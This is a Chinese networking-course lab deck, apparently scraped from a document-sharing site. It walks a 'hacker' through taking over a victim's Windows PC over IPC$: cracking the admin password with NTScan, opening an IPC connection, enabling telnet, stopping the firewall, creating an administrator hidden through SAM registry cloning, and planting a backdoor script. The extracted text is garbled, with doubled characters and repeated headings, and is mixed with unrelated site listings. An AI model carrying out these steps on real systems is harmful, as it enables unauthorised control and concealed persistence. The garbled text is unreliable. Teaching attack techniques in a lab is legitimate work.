




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
1、第第1 1章章 網(wǎng)絡(luò)安全概述網(wǎng)絡(luò)安全概述 實(shí)訓(xùn)實(shí)訓(xùn)1-31-3:利用:利用IPCIPC漏洞進(jìn)行遠(yuǎn)程攻擊(學(xué)時)漏洞進(jìn)行遠(yuǎn)程攻擊(學(xué)時) 本次課要點(diǎn)本次課要點(diǎn)學(xué)習(xí)目標(biāo)重點(diǎn)難點(diǎn)實(shí)訓(xùn)目的實(shí)訓(xùn)目的掌握常用掃描軟件的使用。熟悉黑客攻擊原理。掌握IPC漏洞的攻擊方式。熟悉常用網(wǎng)絡(luò)命令的用法。實(shí)訓(xùn)背景實(shí)訓(xùn)背景某黑客小黑從網(wǎng)上下載了一個掃描工具NTScan,通過掃描得到了小李計算機(jī)的管理員帳號和密碼,接著通過命令與小李建立IPC連接,然后在小李計算機(jī)上開啟telnet服務(wù),上傳和運(yùn)行程序,進(jìn)行遠(yuǎn)程注冊表配置,建立一個隱藏的管理員用戶,實(shí)現(xiàn)對小李計算機(jī)的完全控制。實(shí)訓(xùn)拓?fù)鋵?shí)訓(xùn)拓?fù)鋵?shí)訓(xùn)設(shè)備實(shí)訓(xùn)設(shè)備設(shè)備設(shè)備數(shù)量數(shù)量
2、計算機(jī)(安裝windows操作系統(tǒng)) 2臺掃描軟件NTScan1個攻擊軟件sc.exe1個實(shí)訓(xùn)步驟實(shí)訓(xùn)步驟1.配置計算機(jī)和服務(wù)器的IP地址,保證網(wǎng)絡(luò)通暢。2.小黑在計算機(jī)上安裝NTScan掃描軟件。3.掃描目標(biāo)計算機(jī)。小黑打開掃描軟件NTScan,輸入計算機(jī)的IP地址,單擊 按鈕,開始掃描目標(biāo)計算機(jī)。掃描完成后,便得到了計算機(jī)開放的端口、操作系統(tǒng)類型和管理員的密碼,如所示。4.入侵目標(biāo)計算機(jī)。5.添加隱藏用戶。6.保留管理后門,隱藏攻擊痕跡。1.1.配置計算機(jī)和服務(wù)器的配置計算機(jī)和服務(wù)器的IPIP地址,保證網(wǎng)絡(luò)通暢地址,保證網(wǎng)絡(luò)通暢2.2.小黑在計算機(jī)上安裝小黑在計算機(jī)上安裝NTScanNTS
3、can掃描軟件掃描軟件3.3.掃描目標(biāo)計算機(jī)掃描目標(biāo)計算機(jī)3.3.掃描目標(biāo)計算機(jī)掃描目標(biāo)計算機(jī)小黑打開掃描軟件NTScan,輸入計算機(jī)的IP地址,單擊 按鈕,開始掃描目標(biāo)計算機(jī)。掃描完成后,便得到了計算機(jī)開放的端口、操作系統(tǒng)類型和管理員的密碼,如所示。4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)(1)小黑在命令窗口輸入命令“net use 192.168.1.254 123456 /user:administrator”,建立IPC連接,如所示。4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)(2)輸入sc命令掃描目標(biāo)計算機(jī)的所有服務(wù)列表,并保存到“c:search.txt”文
4、件中,如所示。4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)(3)打開文件“c:search.txt”,找到telnet,確認(rèn)telnet的服務(wù)狀態(tài)(默認(rèn)為禁用狀態(tài)),如所示。4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)(4)如果知道telnet的服務(wù)名稱,可以直接使用命令“sc IP qc tlntsvr”查看,如所示。4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)(5)輸入命令“sc IP config tlntsvr start= auto”,將telnet服務(wù)的禁用狀態(tài)設(shè)置為自動運(yùn)行,如所示。4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)(6)輸入命令“sc IP start tlntsvr”,開啟telnet服務(wù),如所示
5、。4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)(7)輸入命令“sc IP stop sharedaccess”,停用目標(biāo)計算機(jī)的windows防火墻,如所示。 注意:如果配置了路由和遠(yuǎn)程訪問,要先禁用掉。4.4.入侵目標(biāo)計算機(jī)入侵目標(biāo)計算機(jī)(8)輸入命令“sc IP qc romoteregistry”查詢目標(biāo)計算機(jī)啟用了遠(yuǎn)程注冊表服務(wù),如果該服務(wù)為停用狀態(tài),則啟用。5.5.添加隱藏用戶添加隱藏用戶5.5.添加隱藏用戶添加隱藏用戶(1)輸入命令“telnet IP”建立telnet連接,管理目標(biāo)計算機(jī),如所示。5.5.添加隱藏用戶添加隱藏用戶(2)接著會提示發(fā)送信息可能不安全,這里輸入“y”,表示要繼
6、續(xù)進(jìn)行操作,如所示。5.5.添加隱藏用戶添加隱藏用戶(3)輸入管理員的賬戶和密碼,如所示。5.5.添加隱藏用戶添加隱藏用戶(4)輸入命令“net user 名字 密碼/add”,可以在目標(biāo)計算機(jī)上建立賬戶,如所示。5.5.添加隱藏用戶添加隱藏用戶(5)在運(yùn)行窗口中輸入“RegEdit”命令打開“注冊表編輯器”窗口,如所示。5.5.添加隱藏用戶添加隱藏用戶(6)選擇【文件】【-連接網(wǎng)絡(luò)注冊表】菜單,在“選擇計算機(jī)”窗口中輸入目標(biāo)計算機(jī)的地址,如所示5.5.添加隱藏用戶添加隱藏用戶(7)單擊按鈕,在彈出的對話框中輸入計算機(jī)的用戶名和密碼,如所示,便可打開遠(yuǎn)程計算機(jī)的注冊表。5.5.添加隱藏用戶添加
7、隱藏用戶(8)打開目標(biāo)計算機(jī)的注冊表,右擊“HKEY_LOCAL_MACHINE”項(xiàng)下的“SAM”項(xiàng)下的“SAM”選擇“權(quán)限”5.5.添加隱藏用戶添加隱藏用戶(9)在SAM權(quán)限窗口中,賦予管理員完全控制權(quán)限,如所示,斷開與目標(biāo)計算機(jī)的連接,然后重新建立連接。5.5.添加隱藏用戶添加隱藏用戶(10)展開目標(biāo)計算機(jī)的“HKEY_LOCAL_MACHINESAMSAMDomainsUserName”項(xiàng),找到“administrator”和新建的用戶“hack”,記錄它們的類型,如所示。5.5.添加隱藏用戶添加隱藏用戶(11)展開目標(biāo)計算機(jī)“HKEY_LOCAL_MACHINESAMSAMDomain
8、sAccountUsers”項(xiàng)下后三位1F4的子項(xiàng),該項(xiàng)和administrator相對應(yīng),如所示。5.5.添加隱藏用戶添加隱藏用戶(12)雙擊右側(cè)窗口中的F鍵值,在打開的窗口中復(fù)制全部數(shù)據(jù),如所示。5.5.添加隱藏用戶添加隱藏用戶(13)展開目標(biāo)計算機(jī)“HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers”項(xiàng)下后三位3FA的子項(xiàng),使用從1F4項(xiàng)復(fù)制的數(shù)據(jù)覆蓋3FA項(xiàng)F鍵值的數(shù)據(jù),如所示。5.5.添加隱藏用戶添加隱藏用戶(14)導(dǎo)出目標(biāo)計算機(jī)注冊表的hack項(xiàng)和000003FA項(xiàng),保存為文件“c:hack1.reg”和“c:hack2.reg”,如所示。5.5
9、.添加隱藏用戶添加隱藏用戶5.5.添加隱藏用戶添加隱藏用戶(15)返回到telnet命令行,輸入命令“net user hack/delete”,刪除目標(biāo)計算機(jī)的賬戶“hack”,如所示。5.5.添加隱藏用戶添加隱藏用戶(16)將文件“hack1.reg”和“hack2.reg”復(fù)制到目標(biāo)計算機(jī),如所示。 5.5.添加隱藏用戶添加隱藏用戶(17)在目標(biāo)計算機(jī)上輸入命令“reg import hack1.reg和reg import hack2.reg”,導(dǎo)入注冊表“hack1.reg”和“hack2.reg”,如所示。5.5.添加隱藏用戶添加隱藏用戶(18)完成本步后將真正的在目標(biāo)計算機(jī)上建立
10、一個隱藏用戶。(19)在小李計算機(jī)上打開“計算機(jī)管理”窗口,不能看見用戶“hack”,如所示。5.5.添加隱藏用戶添加隱藏用戶(20)打開目標(biāo)計算機(jī)的注冊表,右擊“HKEY_LOCAL_MACHINESAMSAM”選擇“權(quán)限”取消管理員的讀取和完全控制權(quán)限,恢復(fù)到默認(rèn)狀態(tài)。(21)輸入命令“net user 對方IP delete”,刪除目前和目標(biāo)計算機(jī)的IPC連接,如所示。6.6.保留管理后門,隱藏攻擊痕跡保留管理后門,隱藏攻擊痕跡6.6.保留管理后門,隱藏攻擊痕跡保留管理后門,隱藏攻擊痕跡(1)在本地建立一個腳本文件“open23.bat”,內(nèi)容如所示。6.6.保留管理后門,隱藏攻擊痕跡保留管理后門,隱藏攻擊痕跡(2)使用剛才建立的用戶“hack”重新連接到遠(yuǎn)程計算機(jī),如所示。6.6.保留管理后門,隱藏攻擊痕跡保留管理后門,隱藏攻擊痕跡(3)輸入命令,將腳本文件復(fù)制到目標(biāo)計算機(jī)的C盤下,如所示。6.6.保留管理后門,隱藏攻擊痕跡保留管理后門,隱藏攻擊痕跡(4)通過telnet連接到遠(yuǎn)程計算機(jī),進(jìn)入目標(biāo)計算機(jī)的C盤運(yùn)行open23.bat腳本。6.6
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 魚塘土方開挖施工方案
- 蚌埠九年級二模數(shù)學(xué)試卷
- 2025年高性能纖維超細(xì)纖維項(xiàng)目建議書
- 灞橋工程鐵藝花箱施工方案
- 2025年柔印CTP項(xiàng)目發(fā)展計劃
- 馬凳筋專項(xiàng)施工方案
- 渠道預(yù)制板襯砌施工方案
- 多重發(fā)展模式在林業(yè)高效種植中的應(yīng)用價值及實(shí)現(xiàn)路徑探討
- 基本醫(yī)療衛(wèi)生服務(wù)面臨的主要問題
- 流動式起重機(jī)分解組塔施工方案
- 煤礦防治水中長期規(guī)劃2017—2019
- 2022年鄉(xiāng)鎮(zhèn)(街道)執(zhí)法人員資格考試題庫(含答案)
- 新版廣西大學(xué)畢業(yè)設(shè)計封面
- 幼兒園一日生活中的保教結(jié)合(課堂PPT)
- 有害物質(zhì)培訓(xùn)教材(ROHS2.0及REACH)
- 基于深度學(xué)習(xí)的圖像壓縮感知算法綜述
- 德語A1單詞表
- ARL4460 OXSAS曲線制作及學(xué)習(xí)筆記
- 主板維修思路分析
- 高三地理二輪專題河流特征
- Unit__A_View_of_Mountains
評論
0/150
提交評論